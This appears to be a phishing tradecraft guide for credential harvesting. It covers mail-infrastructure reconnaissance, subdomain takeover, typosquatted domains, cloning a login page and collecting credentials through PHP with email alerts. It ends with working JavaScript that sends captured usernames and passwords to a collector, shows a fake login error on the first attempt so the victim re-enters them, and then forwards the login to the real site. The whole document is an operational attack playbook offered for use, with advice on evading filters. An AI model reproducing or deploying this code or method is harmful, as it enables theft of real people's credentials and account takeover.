Credential Harvest
Important Notes
Perform OSINT to identify the target's MX records and mail provider, then send from the same infrastructure so the message arrives as provider-to-provider traffic rather than from an unknown sender.
Eg: Office365 Business Essentials
Never put the payload, or a direct link to it, in the mail itself.
Instead link to a WordPress blog post (matching the pretext) that contains the link to the HTA together with the instructions for opening the malicious attachment.
Use a stageless payload. (Staged DLLs may be caught by IDS/IPS while the second stage is downloaded.)
Send test emails to non-existent addresses at the target domain: the bounce (NDR) usually returns the original headers, which reveal the mail gateways and filters the message passed through.
Ideal domain reputation categories: Medical, Finance, Education (.education domains).
Choosing a Domain Name
Subdomain takeover
Companies often set up CNAME records to point a subdomain at another domain, typically for cloud services.
Eg: The marketing dept. runs a promotion on promotion.marketing.com and points this subdomain at a site the marketing team created on AWS.
If the company lets that "other" domain expire but keeps the subdomain's CNAME record pointing at it, attackers can purchase the expired domain and use it for credential harvesting. The tell-tale sign is a CNAME whose target no longer resolves (NXDOMAIN).
Tools to identify:
Enumerate subdomains (Sublist3r, Amass, subfinder), then resolve each one's CNAME target and check whether it still resolves.
Open-redirect vulnerabilities on the target's own domain (the phishing link then starts with the legitimate domain and redirects to yours).
Typosquatting (check name availability with NameChk):
Add "mail", "vpn", "email". eg: fortynorthsecurityemail
Change the TLD (.net, .org; .dev for developer pretexts)
.education (for policy pretexts) - Symantec immediately categorizes it as education!
Blue teams hunt for typosquatted domains with brand-protection services such as:
Zerofox
Mark Monitor
Website Cloning
SingleFile (browser extension)
Saves the page and all of its dependencies into a single HTML file.
Does not preserve the directory structure.
By default it inserts a comment into the saved page, which needs to be removed.
Add </body></html> at the end of the downloaded HTML page.
You may need to delete the first 2 lines (encoded) below <html> for JS to work; these are typically the <meta> tags SingleFile inserts, including a Content-Security-Policy that blocks scripts.
Capturing Credentials
1 ] Select the form in the cloned page that you want to capture information from.
Search the HTML source for the <form> used for logging in. Note down the form id and the username and password field ids/names. If the form has no id, add a generic one such as 'loginForm'.
2 ] Insert JS that logs the credentials → then forward the POST request to the real server.
Downside of forwarding: if the victim mistypes their credentials on the first attempt, they land on the real site's failed-login page and you have captured a bad password. Alternatively, deliberately display an "incorrect credentials" error for every first attempt, so the victim re-types carefully, and forward only the second submission.
3 ] Modify the HTML <form> so it calls the JS first.
You will typically find one of the following two submission patterns:
<form method="post" id="loginForm" onsubmit="return beforeSubmit();">
<span id="submitButton" role="button" onclick="return beforeSubmit();">Sign In</span>
If the submit control is not a <button> or <input type="submit"> but a <span> or <div> with an id,
remove the onsubmit="..." from the <form> tag and instead add onclick="return beforeSubmit();" to the <span>. Note that a click on a <span> does not submit the form by itself, so in that case the handler has to call form.submit() when it decides to forward.
4 ] Create server-side PHP to collect the credentials (write the POSTed fields to a log file).
5 ] Copy your HTML page to the /var/www/html directory.
Create the necessary subfolders and set permissions.
Mirror the path structure of the original domain when creating the subfolders.
This keeps the links looking legitimate. Alternatively, Apache rewrite rules can map the paths.
6 ] Set server permissions to protect the logged credentials.
Protect your data.txt: keep it outside the web root (or deny web access to it in the Apache config) and make it writable only by the web-server user, so nobody can fetch the harvested credentials over HTTP.
7 ] Create a cron job that emails you when new credentials are captured.
Use the SendGrid Mail API to send the notification.
8 ] Start the Apache service.
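Added example (not the original notes' code), covering steps 2 and 3: the beforeSubmit() hook and the <span> click wrapper wired into the cloned form, including the first-attempt fake-error logic. The decision is kept in a DOM-free function so it can be tested outside a browser. The field names username and password, the form id loginForm, the collector path /log.php, the element id errorMsg and the real login URL are assumptions for this example.

```javascript
// Assumed names for this example: the collector endpoint from step 4, the real
// site's form action, and an error element added to the cloned page.
const COLLECTOR_URL = "/log.php";
const REAL_LOGIN_URL = "https://login.example.com/login";
const STATE_KEY = "attempts";

// Decide what to do with one submission. `attempts` is how many times this
// browser has already submitted. The first attempt is always answered with a
// fake "incorrect credentials" error so the victim re-types carefully; later
// attempts are forwarded to the real server. Every attempt is recorded.
function decide(attempts, creds) {
  const attempt = attempts + 1;
  const fakeError = attempt === 1;
  return {
    record: { user: creds.user, pass: creds.pass, attempt },
    fakeError,
    forward: !fakeError,
    attempts: attempt,
  };
}

// application/x-www-form-urlencoded body for the collector.
function encodeForm(fields) {
  return Object.entries(fields)
    .map(([k, v]) => encodeURIComponent(k) + "=" + encodeURIComponent(String(v)))
    .join("&");
}

// Browser glue: called from onsubmit="return beforeSubmit();" on the <form>.
// Returning false cancels the submission; returning true lets the browser
// POST the unchanged field names to REAL_LOGIN_URL.
function beforeSubmit() {
  const form = document.getElementById("loginForm");
  const creds = {
    user: form.elements["username"].value,
    pass: form.elements["password"].value,
  };
  const d = decide(Number(sessionStorage.getItem(STATE_KEY) || 0), creds);
  sessionStorage.setItem(STATE_KEY, String(d.attempts));
  // sendBeacon is delivered even if the page navigates away immediately.
  navigator.sendBeacon(
    COLLECTOR_URL,
    new Blob([encodeForm(d.record)], { type: "application/x-www-form-urlencoded" })
  );
  if (d.fakeError) {
    document.getElementById("errorMsg").textContent = "Incorrect username or password.";
    return false;
  }
  form.action = REAL_LOGIN_URL;
  return true;
}

// Browser glue for the <span> variant: a click on a span does not submit the
// form by itself, so once beforeSubmit() agrees, submit it explicitly.
// form.submit() does not fire onsubmit, which is why the <form> tag's
// onsubmit attribute is removed in that variant.
function submitButtonClick() {
  if (beforeSubmit()) document.getElementById("loginForm").submit();
  return false;
}
```

Put the block in a <script> ahead of the form, add an empty element with id errorMsg where the real site shows its login error, and keep the cloned form's field names identical to the real site's so the forwarded POST is accepted. Whether the real site accepts a cross-site POST depends on its CSRF protection; if it rejects it, forward from the collector on the server side instead, as step 2 describes.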